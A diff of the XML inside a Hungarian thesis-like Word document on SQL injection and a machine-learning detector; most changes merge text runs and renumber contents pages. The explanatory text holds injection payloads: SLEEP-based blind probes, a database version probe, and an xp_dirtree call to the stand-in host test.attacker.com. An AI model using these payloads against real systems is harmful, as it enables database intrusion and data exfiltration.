                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2337,7 +2337,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2427,7 +2427,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2518,7 +2518,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2611,7 +2611,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2702,7 +2702,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2795,7 +2795,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2887,7 +2887,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2979,7 +2979,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3071,7 +3071,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3163,7 +3163,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3255,7 +3255,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3348,7 +3348,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3441,7 +3441,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3532,7 +3532,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3623,7 +3623,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3697,7 +3697,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3771,7 +3771,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3845,7 +3845,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3919,7 +3919,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4575,21 +4575,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egyes esetekben</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> parancsokat adhat ki az operációs rendszernek</w:t>
+        <w:t>, emellett adminisztrációs műveleteket hajthatnak végre az adatbázisban, a DBMS fájlban található adott fájl tartalmát helyreállíthatja a rendszerben, és egyes esetekben parancsokat adhat ki az operációs rendszernek</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6733,155 +6719,119 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=1-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SLEEP(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>card</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=1-IF(MID(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>VERSION(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7094,48 +7044,52 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>https://example.com/products.aspx?id=1;EXEC%20master..xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dekódoláskor a </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>xp_dirtree%20'%5c%5ctest.attacker.com%5c'+--+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dekódoláskor a </w:t>
+        <w:t>%20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7143,13 +7097,13 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%20</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és a </w:t>
+        <w:t>%5c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7157,43 +7111,27 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>%5c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a szóköznek és a fordított per jelnek felelnek meg, így az URL ténylegesen így néz ki: </w:t>
-      </w:r>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18153,159 +18091,342 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>concatenate</w:t>
+        <w:t>concatenated_title</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>d_title</w:t>
+        <w:t>d</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>d</w:t>
+        <w:t>.csv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-ben</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az összefűzés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az összes </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>csv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> viszonylatában</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak a saját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>jában.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Így a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vectorizer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>már a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>összefűzött</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>és felcí</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kézett </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\machine_learning_app\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>concatenated</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>_titled</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>.csv</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>-ben</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Az összefűzés</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egyszerű oka, hogy </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>későbbiekben az egyes értékek gyakorisága lesz fontos</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az összes </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>-t dolgozza fel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, hogy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">olyan </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>csv</w:t>
+        <w:t>numpy</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> viszonylatában</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak a saját</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>jában.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vectorizer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.py</w:t>
+        <w:t xml:space="preserve"> fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>okat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hoz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>zon</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> létre, ami</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ket</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni tud.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18317,123 +18438,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>már a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>összefűzött</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és felcí</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kézett </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
